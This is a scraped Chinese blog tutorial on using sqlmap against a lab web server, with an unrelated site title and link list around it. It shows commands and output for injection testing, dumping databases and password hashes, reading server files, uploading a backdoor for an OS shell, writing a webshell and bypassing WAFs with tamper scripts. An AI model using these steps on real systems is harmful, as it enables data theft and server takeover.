当前位置: 首页 > news >正文

哈尔滨做网站php 设置网站根目录

哈尔滨做网站,php 设置网站根目录,天津电商网站建设,网站搜索出来有图片目录 sqlmap工具安装#xff1a; 工具说明#xff1a; 主要功能特性包括#xff1a; 基本使用示例#xff1a; 先下载python2.7.9版本 sqlmap运行 sqlmap工具使用 -u -r –-levelLEVEL扫描深度级别 --riskRISK 执行测试的风险 -threads 线程数 -batch-smart智能…目录 sqlmap工具安装 工具说明 主要功能特性包括 基本使用示例 先下载python2.7.9版本 sqlmap运行 sqlmap工具使用 -u -r –-levelLEVEL扫描深度级别 --riskRISK 执行测试的风险 -threads 线程数 -batch-smart智能判断测试 --mobile模拟测试手机环境站点 -m 批量注入 --force-ssl跑https网站 注入获取数据命令 获取表名 字段名 数据内容 读文件内容 系统交互的shell 写webshell sqlmap过waf sqlmap工具安装 工具说明 sqlmap 是一个强大的开源自动化工具专门用于检测和利用SQL注入漏洞。它能够帮助安全研究人员和渗透测试人员在web应用程序中发现并利用SQL注入漏洞进而提取数据库中的数据甚至控制数据库服务器。Sqlmap支持多种数据库管理系统包括但不限于MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等。 主要功能特性包括 自动化检测自动识别SQL注入漏洞无需手动构造复杂的注入语句。 广泛支持支持HTTP(S)协议能够针对GET、POST及Cookie参数进行注入测试。 数据库指纹识别能够识别出后端数据库类型。 数据提取可以从数据库中提取数据包括但不限于表、列、用户权限等。 数据库接管在某些条件下能够实现对数据库服务器的完全控制执行系统命令、读写文件等。 绕过技巧内置多种绕过WAFWeb应用防火墙和过滤机制的技术。 多线程支持多线程扫描提高效率。 输出报告能够生成XML、HTML、JSON等多种格式的扫描报告。 基本使用示例 检测注入   sqlmap -u http://example.com/vulnerable.php?id1指定注入参数   sqlmap -u http://example.com/vulnerable.php --param-del --data id1submitSubmit暴力猜解数据库表名   sqlmap -u http://example.com/vulnerable.php?id1 --tables从特定表中猜解列名   sqlmap -u http://example.com/vulnerable.php?id1 -D database_name --columns提取特定列的数据   sqlmap -u http://example.com/vulnerable.php?id1 -D database_name -T users -C username,password 先下载python2.7.9版本 设置环境变量python的安装路径和scripts路径添加到电脑环境变量 sqlmap运行 winR cmd --进入win命令行 cd C:\lan\sqlmap--sql软件路径 sqlmap.py  -u http://10.0.0.101:90/mysql/sql.php?id1 sqlmap扫描历史记录文件夹目录 sqlmap工具使用 -u sqlmap.py  -u http://10.0.0.101:90/mysql/sql.php?id1-- -u为get注入--/mysql/sql.php?id1 是请求的具体路径其中 sql.php 是目标脚本文件id1 是传递给该脚本的一个参数值。 heuristic (parsing) test showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y --输出选Y do you want to include all tests for MySQL extending provided level (1) and risk (1)? [Y/n] n--输出一般选n GET parameter id is vulnerable. Do you want to keep testing the others (if any)? [y/N] n--输出一般选n --生产环境测到此次已完成。  结果解读 结果解读 GET parameter id is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 24 HTTP(s) requests: --- Place: GET Parameter: id--注入点位置漏洞位于GET请求的id参数中     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: id1 AND 79117911--布尔型盲注 此类注入依赖于响应中是否有变化来判断SQL语句的真假从而逐位猜解数据。     Type: UNION query     Title: MySQL UNION query (NULL) - 4 columns     Payload: id1 UNION ALL SELECT CONCAT(0x3a6773753a,0x7a59485655536e69784f,0x3a65656a3a),NULL,NULL,NULL#--利用UNION操作符将恶意查询与原始查询结果合并从数据库中直接提取信息。这里使用了十六进制编码来构造输出以绕过可能的字符过滤。     Type: AND/OR time-based blind     Title: MySQL 5.0.11 AND time-based blind     Payload: id1 AND SLEEP(5)--时间和基于OR的盲注 通过使数据库执行一个延时操作如SLEEP(5)根据响应时间判断SQL语句执行情况适合于那些仅能通过响应时间变化来判断的场景。 -r 语法sqlmap.py -r post.txt -p 注入参数 如sqlmap.py -r post.txt -p username,password-- sqlmap.py是一个自动化的SQL注入工具用于检测和利用Web应用程序中的SQL注入漏洞。 -- -r post.txt: 这个参数告诉sqlmap从指定的文件(post.txt)中读取原始HTTP请求。post.txt文件应包含一个或多个HTTP请求. -- -p 注入参数:如果POST请求中有参数名为username和password正确的用法应该是-p username,password。这个选项告诉sqlmap只针对列出的参数执行SQL注入测试。 –-levelLEVEL扫描深度级别 语法sqlmap.py -u http://10.0.0.101:90/mysql/sql.php?id1 --level 1#执行测试的等级1-5默认为1使用–-level 参数且数值2的时候也会检查cookie里面的参数当3的时候将检查User-agent和Referer。 --riskRISK 执行测试的风险 如sqlmap.py  -r C:\lan\sqlmap\1.txt  --level 3 -v 6 #-r C:\lan\sqlmap\1.txt: 使用-r参数指定一个包含HTTP请求的文件路径 #--level 3: 设置扫描的深度级别为3 #-v 6: 设置sqlmap的详细输出级别为6​ ERBOSE信息级别: 0-6 缺省1其值具体含义“0”只显示python错误以及严重的信息1同时显示基本信息和警告信息默认“2”同时显示debug信息“3”同时显示注入的payload“4”同时显示HTTP请求“5”同时显示HTTP响应头“6”同时显示HTTP响应页面如果想看到sqlmap发送的测试payload最好的等级就是3。 -threads 线程数 线程数如果你想让sqlmap跑的更快可以更改这个线程 数的值默认值为10 -batch-smart智能判断测试 C:\lan\sqlmap sqlmap.py  -u http://10.0.0.101:90/mysql/sql.php?id1  -batch-smart--您的命令旨在非交互式地即无需人工确认每一步操作使用SQLMap对指定的Web应用程序URL进行SQL注入漏洞检测同时希望该工具能够智能地处理测试过程中的各种情况以提高效率和安全性。 --数据库表名、用户名、账户密码破解、数据库内容脱库保存到攻击者主机标注的目录里违法 1、目标URL与检测点 目标URL为http://10.0.0.101:90/mysql/sql.php?id1。 在GET参数id上发现了三种类型的SQL注入漏洞 布尔型盲注Boolean-based blind。 联合查询注入UNION query。 时间延迟盲注AND/OR time-based blind。 2-3、数据库信息 后端数据库管理系统DBMS确认为MySQL版本5.5.53尽管在信息摘要中最初识别为5.0.11这可能是识别或报告中的一个不一致。 当前数据库用户为rootlocalhost并且此用户具有数据库管理员DBA权限。 当前数据库名为sql。 Web服务器操作系统为WindowsWeb应用技术为PHP 5.4.45运行在Apache 2.4.23上。 系统与用户详情 主机名为oldboy-f74d04fe。 列出了数据库管理系统中的三个用户均为root分别来自不同的主机地址127.0.0.1, ::1, localhost-----------------------------------说明 do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] 进行数据库转储操作时的详细日志输出。它显示了SQLMap如何逐个表地从指定的数据库在这个案例中主要是performance_schema和bwapp中提取结构和数据并将这些信息保存为CSV文件的过程。 do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] 是否希望对这些哈希值进行字典攻击以尝试破解密码 [Y] 表示“是”同意SQLMap使用内置或自定义的字典来尝试破解识别到的密码哈希。 [n] 表示“否”不进行破解操作仅停留在当前状态。 [q] 通常意味着“退出”可能用于终止当前的SQLMap会话 do you want to crack them via a dictionary-based attack? [Y/n/q] 是否决定继续通过字典攻击来尝试破解已发现的密码哈希 do you want to crack them via a dictionary-based attack? [Y/n/q] 您想通过基于字典的攻击来破解它们吗[Y/n/q] --mobile模拟测试手机环境站点 sqlmap.py  -u http://10.0.0.101:90/mysql/sql.php?id1 --mobile -m 批量注入 --force-ssl跑https网站 注入获取数据命令 --dbs  //默认情况系sqlmap会自动的探测web应用后端的数据库类型MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2 --current-user大多数数据库中可检测到数据库管理系统当前用户 --current-db当前连接数据库名 --is-dba判断当前的用户是否为管理 --users列出数据库所有所有用户  获取表名 --tables -D 数据库名 字段名 --columns -T user -D abc 数据内容 -T user -C username,password,email --dump 读文件内容 --file-read 【/etc/password】 sqlmap.py  -u http://10.0.0.101:90/mysql/sql.php?id1  --file-read c://lan//1.txt ##--file-read: 这个选项告诉 sqlmap 尝试读取远程服务器上的一个文件。紧跟其后的 c://lan//1.txt 是指定要读取的文件路径。通常用于验证SQL注入漏洞的存在并尝试获取敏感信息。尽量两个用反斜杠一个反斜杠容易被反义 ##网站文件路径获取方式1、注入报错方式 2、搜索引擎搜索 系统交互的shell --os-shell 流程 sqlmap.py  -u http://10.0.0.101:90/mysql/sql.php?id1  --os-shell--os-shell: 此选项指示sqlmap尝试获取目标系统的操作系统级别的命令执行能力即创建一个远程shell。一旦成功攻击者就可以通过这个shell执行任意操作系统命令从而获得对服务器的进一步控制. [21:08:46] [INFO] retrieved the web server document root: C:\phpStudy\WWW  --这条信息表示sqlmap成功识别了Web服务器的文档根目录。文档根目录是C:\phpStudy\WWW [21:08:46] [INFO] retrieved web server full paths: C:/phpStudy/WWW/mysql/sql.php   --这条信息意味着sqlmap确定了请求的特定文件mysql/sql.php在服务器上的完整路径 please provide additional comma separated file paths to try to upload the agent inside the possible document: c\\phpstudy\\WWW\\--输入上传指定目录根目录c\\phpstudy\\WWW\\ [21:10:09] [INFO] the file stager has been successfully uploaded on C:/phpStudy/WWW - http://10.0.0.101:90/tmpuckst.php   --这是一个临时文件通常用于在目标服务器上部署更复杂的恶意软件或后门。文件stager是攻击的一部分它可能包含一个小型脚本该脚本可以下载并执行更大的恶意代码。 [21:10:09] [INFO] the backdoor has been successfully uploaded on C:/phpStudy/WWW - http://10.0.0.101:90/tmpbpnbi.php  --这是sqlmap上传的后门文件它可能允许攻击者通过HTTP访问来执行操作系统命令。攻击者现在可以通过http://10.0.0.101:90/tmpbpnbi.php与服务器建立交互。 os-shell ipconfig--sqlmap已经成功获得了目标服务器的操作系统shell。提示os-shell让你可以输入命令来执行操作系统级别的操作输入ipconfig会运行Windows系统中的命令显示网络接口的配置信息。 也可根据sqlmap生成的木马文件进行通过阅览器访问木马文件进行交互 http://10.0.0.101:90/tmpuckst.php--阅览器访问刚才sqlmap生成的.php木马功能小马文件进行上传大马与web操作系统交互 http://10.0.0.101:90/hao.php--阅览器访问刚才通过tmpuckst.php上传的大马进行操作系统交互。 方式一sqlmap命令行与web主机交互 方式二也可根据sqlmap生成的木马文件进行通过阅览器访问木马文件进行交互 连接成功 写webshell --file-write  c:/1.txt” --file-dest “C:/phpStudy/WWW/3.php” -v1      将本机的c:/1.txt文件上传到目标服务器C:/phpStudy/WWW/3.php上可传一句话木马 --/*将/software/nc.exe文件上传到C:/WINDOWS/Temp下*/  sqlmap过waf --tamper 脚本 如sqlmap.py -u http://10.0.0.101:90/mysql/sql.php?id1  --tamper base64encode.py -v 5 --dbs 使用多个脚本用逗号隔开如--tamper base64encode.py,space2plus.py sqlmap.py: SQLMap的主执行文件这是一个自动化的SQL注入工具。 -u: 参数用于指定目标URL这里是http://10.0.0.101:90/mysql/sql.php?id1。这告诉SQLMap要测试哪个页面的SQL注入漏洞。 --tamper base64encode.py: 使用base64encode.py篡改器。这个脚本会将请求参数在这个例子中是id1通过Base64编码以绕过可能的安全过滤或检测机制。 -v 5: 设置详细级别为5。SQLMap有0到5的详细级别5是最详细的会显示所有可能的信息包括每个请求和响应。 --dbs: 这个选项让SQLMap列出目标数据库服务器上的所有可用数据库。它会尝试获取数据库管理系统DBMS的元数据以发现存在的数据库名称。 声明 此文章只做技术研究谨遵守国家相关法律法规请勿用于违法用途如果您对文章内容有疑问可以尝试留言私信如有侵权请联系小编处理。
http://www.w-s-a.com/news/840806/

相关文章:

  • 福建南平网站建设创意交易平台网
  • 做直播网站要哪些技术内容营销理论
  • 价格划算的网站开发怎么找有赞做网站
  • 做网站店铺图片用什么软件网络营销方案格式
  • 做外贸要自己建网站吗有效的网络营销方式
  • 精通网站开发书籍做网站获取手机号码
  • 论坛做视频网站有哪些济南新站seo外包
  • 哪类型网站容易做冷水滩做微网站
  • 搭建企业网站流程保定徐水网站建设
  • 建设单位到江川区住房和城乡建设局网站伦敦 wordpress 设计
  • 响应式网站的服务麦德龙网站建设目标
  • 做国外单的网站叫什么海南省海口市网站建设
  • 杭州响应式网站案例wordpress5.2.2
  • 网站建设运营维护合同wordpress资源搜索插件
  • 国外网站流量查询东莞网站建设教程
  • 餐饮类网站建设达到的作用东莞工程建设交易中心网
  • 网站设计 知识产权湖北网站建设xiduyun
  • 猫咪网站模版下载中国风 古典 红色 网站源代码
  • 个人网站备案模板制作网站首页
  • 潍坊正规建设网站网站建设设计作业
  • 推荐一下网站谢谢辽宁住房城乡建设部官方网站
  • 网站文件大小英选 网站开发
  • 济南建网站哪家好wordpress编辑器排行
  • 在福州做搬家网站多少钱画册设计网站有哪些
  • 如何让别人浏览我做的网站哪些方法可以建设网站
  • 网站建设与管理网络推广的优点
  • 美食网站的设计与制作做网站的电销话术
  • 中国档案网站建设现状研究陕西建设厅执业资格注册中心网站
  • 网站建设的内容管理怎么用ps切片在dw里做网站
  • 建设婚恋网站用什么搭建涿州网站开发